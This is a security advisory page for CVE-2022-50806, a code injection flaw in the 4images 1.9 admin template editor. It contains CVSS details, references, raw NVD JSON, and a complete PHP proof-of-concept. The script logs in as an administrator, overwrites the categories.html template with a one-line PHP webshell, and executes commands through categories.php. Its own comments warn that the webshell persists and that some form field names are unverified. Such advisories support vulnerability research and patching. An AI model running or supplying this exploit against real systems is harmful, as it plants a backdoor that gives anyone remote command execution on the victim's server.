Security Vulnerability Report
CVE-2022-50806 CVSS 7.2 HIGH

CVE-2022-50806

Published: 2026-01-13 23:15:50
Last Modified: 2026-02-02 16:16:15

Description

4images 1.9 contains a remote command execution vulnerability that allows authenticated administrators to inject reverse shell code through template editing functionality. Attackers can save malicious code in the template and execute arbitrary commands by accessing a specific categories.php endpoint with a crafted cat_id parameter. Reviewer note: the weakness is classed as CWE-94 (code injection) — the admin template editor stores attacker-supplied PHP and the server executes it when the template is rendered. Because administrator privileges are required (PR:H in the vector), this is a post-compromise persistence/escalation issue rather than an unauthenticated RCE; note also that the published PoC supplies the command in a separate cmd parameter and uses cat_id only to select the rendered template.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 (secondary source, from the raw data below): 8.6 HIGH — CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Configurations (Affected Products)

cpe:2.3:a:4homepages:4images:1.9:*:*:*:*:*:*:* - VULNERABLE
4images 1.9 and earlier (as stated by the source page). Note that the NVD CPE match above covers only version 1.9 exactly, so affectedness of earlier releases is not confirmed by the configuration data.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It requires valid administrator credentials, and its payload leaves a persistent webshell in the categories.html template that anyone who can reach categories.php can use — restore the template from a clean copy immediately after testing.
php
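<?php
// CVE-2022-50806 PoC - 4images 1.9 remote command execution through the admin template editor.
//
// Requirements: valid administrator credentials (CVSS PR:H). The script logs in, overwrites the
// categories.html template with a PHP webshell, then requests categories.php to run a command.
//
// Reviewer caveats:
//  - The NVD text says commands are triggered via a crafted `cat_id`; this PoC passes the command
//    in a separate `cmd` GET parameter and uses cat_id=1 only to render categories.html. The exact
//    trigger is taken from the original PoC and is not verified against 4images source here.
//  - Form field names for login.php and admin/templates.php are also unverified; confirm them
//    against the target's HTML forms before relying on this script.
//  - The payload is a persistent, UNAUTHENTICATED webshell: once saved, anyone who can reach
//    categories.php can execute commands. Restore categories.html from a clean copy right after
//    testing. Run only against systems you are explicitly authorized to test.
//
// Usage: php poc.php [target_url] [username] [password] [command]
// With no arguments the defaults below reproduce the original PoC.

/** Return $argv[$index] when present, else $default. */
function poc_arg(array $argv, $index, $default)
{
    return isset($argv[$index]) ? $argv[$index] : $default;
}

/**
 * Abort with a diagnostic when a curl transfer failed at the transport level or returned an
 * HTTP error status. A 2xx/3xx status does not prove the step succeeded (a failed login may
 * still come back as a 200 page), so callers should also inspect the body if they need proof.
 */
function poc_check($ch, $response, $step)
{
    if ($response === false) {
        fwrite(STDERR, "[$step] curl error: " . curl_error($ch) . "\n");
        exit(1);
    }
    $status = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($status >= 400) {
        fwrite(STDERR, "[$step] HTTP $status\n");
        exit(1);
    }
}

/** POST $fields (form-encoded) to $url on the shared handle and return the response body. */
function poc_post($ch, $url, array $fields, $step)
{
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields));
    $body = curl_exec($ch);
    poc_check($ch, $body, $step);
    return $body;
}

/** GET $url on the shared handle and return the response body. */
function poc_get($ch, $url, $step)
{
    curl_setopt($ch, CURLOPT_URL, $url);
    // Switch the handle back to GET. After poc_post() the handle would otherwise keep
    // CURLOPT_POST and the stale POSTFIELDS, so the original PoC's "command" request was
    // really a POST of the template form to categories.php.
    curl_setopt($ch, CURLOPT_HTTPGET, true);
    $body = curl_exec($ch);
    poc_check($ch, $body, $step);
    return $body;
}

$target     = rtrim(poc_arg($argv, 1, 'http://target.com/4images/'), '/') . '/';
$username   = poc_arg($argv, 2, 'admin');
$password   = poc_arg($argv, 3, 'admin123');
$cmd        = poc_arg($argv, 4, 'whoami');
$admin_path = 'admin/templates.php';

// Keep the admin session cookie in a private temp file rather than ./cookies.txt, and remove
// it on exit (including the exit(1) paths in poc_check) so the token is not left on disk.
$cookie_jar = tempnam(sys_get_temp_dir(), '4images-poc-');
register_shutdown_function(function () use ($cookie_jar) {
    @unlink($cookie_jar);
});

$ch = curl_init();
curl_setopt_array($ch, array(
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR      => $cookie_jar,
    CURLOPT_COOKIEFILE     => $cookie_jar,
    CURLOPT_CONNECTTIMEOUT => 10,
    CURLOPT_TIMEOUT        => 30,
));

// Step 1: log in as administrator. Field names are those of the original PoC (unverified).
poc_post($ch, $target . 'login.php', array(
    'action'   => 'login',
    'username' => $username,
    'password' => $password,
), 'login');

// Step 2: overwrite categories.html with a minimal webshell via the template editor.
$malicious_code = '<?php system($_GET["cmd"]); ?>';
poc_post($ch, $target . $admin_path, array(
    'action'           => 'savetemplate',
    'template_name'    => 'categories.html',
    'template_content' => $malicious_code,
), 'savetemplate');

// Step 3: render the template so the injected PHP runs. $output is the whole rendered page
// (now essentially the webshell's output), not only the command's stdout.
$output = poc_get($ch, $target . 'categories.php?cat_id=1&cmd=' . urlencode($cmd), 'execute');
echo "Command output: " . $output;

curl_close($ch);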

References

- https://www.4homepages.de/ (Product)
- https://www.exploit-db.com/exploits/51147 (Exploit)
- https://www.vulncheck.com/advisories/images-remote-command-execution-rce (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50806", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:49.830", "lastModified": "2026-02-02T16:16:15.467", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "4images 1.9 contains a remote command execution vulnerability that allows authenticated administrators to inject reverse shell code through template editing functionality. Attackers can save malicious code in the template and execute arbitrary commands by accessing a specific categories.php endpoint with a crafted cat_id parameter."}, {"lang": "es", "value": "4images 1.9 contiene una vulnerabilidad de ejecución remota de comandos que permite a los administradores autenticados inyectar código de shell inverso a través de la funcionalidad de edición de plantillas. Los atacantes pueden guardar código malicioso en la plantilla y ejecutar comandos arbitrarios al acceder a un endpoint específico categories.php con un parámetro cat_id manipulado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:4homepages:4images:1.9:*:*:*:*:*:*:*", "matchCriteriaId": "2689DA94-EA0E-4988-866D-F6494DA44F50"}]}]}], "references": [{"url": "https://www.4homepages.de/", "source": "[email protected]", "tags": ["Product"]}, {"url": 
"https://www.exploit-db.com/exploits/51147", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/images-remote-command-execution-rce", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}